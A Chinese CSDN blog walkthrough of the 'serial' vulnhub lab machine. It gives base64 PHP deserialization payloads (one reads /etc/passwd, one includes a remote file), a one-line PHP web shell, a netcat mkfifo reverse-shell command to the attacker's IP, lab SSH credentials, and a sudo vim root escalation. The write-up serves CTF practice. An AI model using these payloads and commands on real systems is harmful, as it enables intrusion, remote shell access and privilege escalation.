反序列化serial练习

最新推荐文章于 2024-10-07 20:18:31 发布
最新推荐文章于 2024-10-07 20:18:31 发布
阅读量240 收藏 3
点赞数 7
文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69602647/article/details/140853098
版权

kali:192.168.153.128

信息搜集:

靶机IP: 192.168.153.130

nmap 全端口详细扫描

访问http:

目录扫描:

dirb http://192.168.153.130

访问: http://192.168.153.130/backup/

可以下载下来一个 压缩包: 解压后是三个php文件 网页源代码的文件

要利用反序列化攻克

构造payload: 序列化->base编码

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==

尝试上传一句话木马:

先在自己本地开启网站 比如使用小皮面板  弄一个2.txt

<?php @system($_GET['cmd']);?>

构造payload: 要把空格替换成 \x00

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:24:"http://172.16.1.16/2.txt";}}

base64编码:

Tzo0OiJVc2VyIjoyOntzOjQ6Im5hbWUiO3M6Mzoic2s0IjtzOjM6IndlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjQ6Imh0dHA6Ly8xNzIuMTYuMS4xNi8yLnR4dCI7fX0=

kali监听4444端口:

nc -lvvp 4444

反弹shell:

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.153.128+4444+>/tmp/f

成功!

使用python终端:

python3 -c 'import pty; pty.spawn("/bin/bash")'

提权:

在更目录发现:

credentials.txt.bak

这个可能是ssh 的账号密码 尝试登录:

sk4
KywZmnPWW6tTbW5w

登录成功!

找到第一个flag:

查看sudo -l: 发现有vim

sudo 提权

sudo vim

在命令行模式 输入

:!bash

成功提权!

进入root目录:

找到最终flag

雾魈
关注
反序列化学习笔记【一文打通ctf中的反序列化题目】
jayq1的博客
07-21 5271
本文包含反序列化的各类题目,比如基础的php反序列化 反序列化字符逃逸 phar反序列化 Pickle反序列化 师傅们轻点喷~
java反序列化 URLDNS链分析
m0_64815693的博客
04-14 719
java反序列化 URLDNS链分析
【IO流系列】ObjectStream 序列化流与反序列化
kuxiaoyang的博客
03-01 1303
Java 提供了一种对象**序列化**的机制。用一个字节序列可以表示一个对象,该字节序列包含该`对象的数据`、`对象的类型`和`对象中存储的属性`等信息。字节序列写出到文件之后,相当于文件中**持久保存**了一个对象的信息。 反之,该字节序列还可以从文件中读取回来,重构对象,对它进行**反序列化**。`对象的数据`、`对象的类型`和`对象中存储的数据`信息,都可以用来在内存中创建对象。
序列化以及反序列化
paul1205的博客
10-22 152
序列化 序列化 序列化是什么如何实现对象序列化实战练习 Serializable反序列化总结 使用Reader读取文件内容1使用Reader读取文件内容2 序列化是什么? 将对象的状态存储到特定存储介质的过程。 将Java对象转换为字节序列。 如何实现对象序列化? 实现接口serializable
【QT5.9 + protobuf】二、图片二进制数据序列化反序列化踩坑记录
hyperspace88466的博客
01-09 2275
简介: 图片二进制序列化主要坑在:二进制数据读入char* 后再转为string ,有些‘\0’的字节会把数据直接截断,导致二进制数据不完整了。 下面记录一种可以正确序列化反序列化图片二进制数据的方法,并用qt将图片显示出来。 1. 创建一个图片的数据格式 image.proto // [START declaration] syntax = "proto2"; // [END declaration] message Image { optional string format = 1;
13.异常、IO流、序列化和反序列化
weixin_50975714的博客
04-29 1207
自定义异常,需要继承异常类,自定义一个构造方法,将异常通过super传递到父类中/*自定义异常,需要继承异常类,自定义一个构造方法将异常通过super传递到父类中*/
java 深拷贝 序列化_Java 深拷贝和浅拷贝 利用序列化实现深拷贝
weixin_39953481的博客
02-12 170
Java 深拷贝和浅拷贝深拷贝(deep clone)与浅拷贝(shallow clone)浅拷贝(浅复制、浅克隆):被复制对象的所有变量都含有与原来的对象相同的值,而所有的对其他对象的引用仍然指向原来的对象。换言之,浅拷贝仅仅复制所考虑的对象,而不复制它所引用的对象。深拷贝(深复制、深克隆):被复制对象的所有变量都含有与原来的对象相同的值,除去那些引用其他对象的变量。那些引用其他对象的变量将指向...
vulnhub靶场serial-php渗透
问彡心的博客
07-31 1402
整个渗透过程中主要漏洞在于反序列化的利用配合远程文件包含,将wel的对象替换,由于恰好Log对象中存在handler函数且有文件包含,才能进行利用,我把这招称之为"偷梁换柱",还是很形象的,当执行一句话木马时,离成功也就不远了,随之从反弹终端中得到的账户密码进行远程登陆,在执行命令过程中通过提示发现了sudo下的vim是可以直接执行的,在vim命令行中有!command暂时离开vim到指令列模式下执行command的显示结果,利用此功能成功借用了bash来执行输入的命令httpshttps。...
Java——序列化与反序列化
爱是与世界平行
08-24 664
序列化序列化 序列化是什么 如何实现对象序列化 实战练习 Serializable 反序列化 总结 使用Reader读取文件内容1 使用Reader读取文件内容2 序列化是什么? 将对象的状态存储到特定存储介质的过程。 将Java对象转换为字节序列。 如何实现对象序列化? 实现接口serializable 实战练习:public class BookManager {
12 Java文件处理之写入、读取:IO流(中):高级流(缓冲流、转换流、序列化流和反序列化流、打印流)
smalltorch的博客
09-17 370
前面学FileReader和FileWriter字符流:对于中文只能处理当前平台的编码方式进行编码和解码,不能指定编码格式进行编码解码。这个指定编码的功能,在本节的高级流(转换流)上就会得到处理。另外,高级流都是在上节的四中基本流上面进一步封装而来的,可以说前面基本流是他们的爸爸。缓冲流(提供缓冲区,加快读取写入速度,减少和硬盘交互次数)转换流(可以指定编码格式)基本流—>缓冲流转换流(都是字符流)序列化流和反序列化流(都是字节流)打印流(不能读,只能写,只有输出流)
35.13 Python对象·练习题——《跟老吕学Python·新手》
Python老吕的博客
05-02 42
如何实现对象的自定义字符串表示,使其包含对象的特定属性?如何实现对象的自定义反序列化,以支持特定的存储格式?如何实现对象的自定义序列化,以支持特定的存储格式?如何实现对象的自定义字符串表示,以支持日志记录?如何实现对象的自定义哈希码,以支持哈希表操作?如何实现对象的自定义内存清理,以支持资源释放?如何实现对象的自定义比较,以支持集合操作?如何在对象的属性被访问时执行额外的操作?如何在对象的属性被修改时执行额外的操作?如何实现对象的自定义比较,以支持排序?对象的方法定义在类中的哪个方法里?
PMI-ACP练习题(21)
码农云云的博客
10-20 417
在某一天,当保尔正处于开发用户故事的困难时期,他无意识地用肢体语言向彼特传达了这个情况。A. Push for a remote working environment B. Push for more overtime C. Push for moving the daily scrum to a weekly scrum D. Push for collocating the team Henrietta及她的敏捷团队在进行一项敏捷工作,虽然大家都在公司,但是分隔在不同的办公室,那么她应如何提高沟通?
PMI-ACP练习题(20)
码农云云的博客
10-19 454
在某一天,当保尔正处于开发用户故事的困难时期,他无意识地用肢体语言向彼特传达了这个情况。A. Push for a remote working environment B. Push for more overtime C. Push for moving the daily scrum to a weekly scrum D. Push for collocating the team Henrietta及她的敏捷团队在进行一项敏捷工作,虽然大家都在公司,但是分隔在不同的办公室,那么她应如何提高沟通?
Gbase 8c真题模拟100%及练习题库
weixin_44815362的博客
06-28 1688
3、GBase 8c的弹性伸缩功能,是按表做扩缩容,在建表时指定该表为一致性hash表或普通表,一般建议大表做普通hash表,小表做一致性hash表。1、MOT是一种内存数据库存储引擎,其中所有表和索引完全驻留在内存中。序列与数据表是不同类型的数据库对象,因此在同一个schema下,序列名与数据表名可以是相同的。序列与数据表是不同类型的数据库对象,因此在同一个schema下,序列名与数据表名可以是相同的。Explain的输出,是查询优化的结果,通常可以帮助运维人员更好的了解语句的执行性能情况。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1132
信息安全工程师——机房安全分析与防护篇
CSRF 漏洞 - 学习手册
Blue17 の 小窝
10-05 560
CSRF 漏洞从初识到挖掘全流程笔记合集
HCIP--以太网交换安全(二)&端口安全
最新发布
2401_83878929的博客
10-07 1130
端口安全MAC地址
Web安全 - 安全防御工具和体系构建
小工匠
10-03 1524
最终,设计一个适合公司的安全体系,既是对安全人员技术能力的考验,也是对其与业务发展需求契合度的挑战。安全防御工具只是辅助,最终的效果取决于如何选择和实施它们。
Java对象序列化与反序列化详解
"本章主要介绍了Java对象的序列化与反序列化,包括基本概念、实现过程、相关接口以及注意事项。" 在Java编程中,对象的序列化与反序列化是两个重要的概念。对象序列化是将Java对象转换为可存储或可传输的二进制字节...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值